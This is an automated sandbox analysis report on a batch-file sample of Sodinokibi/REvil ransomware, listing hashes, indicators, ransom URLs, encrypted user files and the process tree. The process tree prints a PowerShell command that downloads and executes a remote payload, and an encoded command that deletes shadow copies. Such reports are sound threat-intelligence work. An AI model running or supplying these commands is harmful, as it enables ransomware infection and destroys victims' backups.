Analysis
-
max time kernel
122s -
max time network
118s -
platform
windows10_x64 -
resource
win10 -
submitted
19-08-2020 22:10
Static task
static1
Behavioral task
behavioral1
Sample
6b344dbcf15e9fffe23ce5307af78070.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
6b344dbcf15e9fffe23ce5307af78070.bat
Resource
win10
General
-
Target
6b344dbcf15e9fffe23ce5307af78070.bat
-
Size
215B
-
MD5
edcaf035412a5f6b004822eeba9ec0bc
-
SHA1
5b65ca011d951eaa8266950415eb13dc55766d40
-
SHA256
a7804db792288327cecffcd3cf6d6addf7ab9d7c56fac80b588aa76e96e0c383
-
SHA512
10e58b8f554cca5133ebb0c33800a2de7e063712a791832eaa505379a7897375737f20bad7c7ce0e6ecd1e79e2ab2d5728529fa6a3750f050d56509503474c02
Malware Config
Extracted
http://185.103.242.78/pastes/6b344dbcf15e9fffe23ce5307af78070
Extracted
C:\42dh2096-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/09D8D1069D6958FB
http://decryptor.cc/09D8D1069D6958FB
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 3864 powershell.exe -
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\LimitResolve.tiff => \??\c:\users\admin\pictures\LimitResolve.tiff.42dh2096 powershell.exe File renamed C:\Users\Admin\Pictures\UninstallDismount.png => \??\c:\users\admin\pictures\UninstallDismount.png.42dh2096 powershell.exe File renamed C:\Users\Admin\Pictures\OpenStep.raw => \??\c:\users\admin\pictures\OpenStep.raw.42dh2096 powershell.exe File renamed C:\Users\Admin\Pictures\SaveStart.png => \??\c:\users\admin\pictures\SaveStart.png.42dh2096 powershell.exe File opened for modification \??\c:\users\admin\pictures\LimitResolve.tiff powershell.exe File renamed C:\Users\Admin\Pictures\CheckpointCopy.crw => \??\c:\users\admin\pictures\CheckpointCopy.crw.42dh2096 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\t430q33.bmp" powershell.exe -
Drops file in Program Files directory 24 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\StopUndo.potm powershell.exe File opened for modification \??\c:\program files\ConnectTest.ogg powershell.exe File opened for modification \??\c:\program files\MountStop.easmx powershell.exe File opened for modification \??\c:\program files\ResetUnregister.DVR powershell.exe File opened for modification \??\c:\program files\SaveOut.css powershell.exe File opened for modification \??\c:\program files\UninstallMerge.ini powershell.exe File opened for modification \??\c:\program files\EnterOptimize.m1v powershell.exe File opened for modification \??\c:\program files\InvokeEdit.ttf powershell.exe File opened for modification \??\c:\program files\DebugDisconnect.otf powershell.exe File opened for modification \??\c:\program files\DebugGet.001 powershell.exe File opened for modification \??\c:\program files\DebugStart.edrwx powershell.exe File opened for modification \??\c:\program files\InitializeEnable.cfg powershell.exe File opened for modification \??\c:\program files\InstallBlock.wmf powershell.exe File opened for modification \??\c:\program files\ResumeLock.mht powershell.exe File created \??\c:\program files (x86)\42dh2096-readme.txt powershell.exe File opened for modification \??\c:\program files\ApprovePublish.m4a powershell.exe File opened for modification \??\c:\program files\MergeBlock.mpv2 powershell.exe File opened for modification \??\c:\program files\OutWatch.aifc powershell.exe File opened for modification \??\c:\program files\ResetStep.vsx powershell.exe File opened for modification \??\c:\program files\SearchApprove.mov powershell.exe File opened for modification \??\c:\program files\StopStart.dwfx powershell.exe File opened for modification \??\c:\program files\WriteNew.wvx powershell.exe File created \??\c:\program files\42dh2096-readme.txt powershell.exe File opened for modification \??\c:\program files\ApproveConvert.au powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepid process 3864 powershell.exe 3864 powershell.exe 3864 powershell.exe 3864 powershell.exe 3864 powershell.exe 3004 powershell.exe 3004 powershell.exe 3004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 3864 powershell.exe Token: SeDebugPrivilege 3864 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe Token: SeBackupPrivilege 4000 vssvc.exe Token: SeRestorePrivilege 4000 vssvc.exe Token: SeAuditPrivilege 4000 vssvc.exe Token: SeTakeOwnershipPrivilege 3864 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 344 wrote to memory of 3864 344 cmd.exe powershell.exe PID 344 wrote to memory of 3864 344 cmd.exe powershell.exe PID 344 wrote to memory of 3864 344 cmd.exe powershell.exe PID 3864 wrote to memory of 3004 3864 powershell.exe powershell.exe PID 3864 wrote to memory of 3004 3864 powershell.exe powershell.exe PID 3864 wrote to memory of 3004 3864 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\6b344dbcf15e9fffe23ce5307af78070.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:344 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/6b344dbcf15e9fffe23ce5307af78070');Invoke-LPYNMMII;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:4000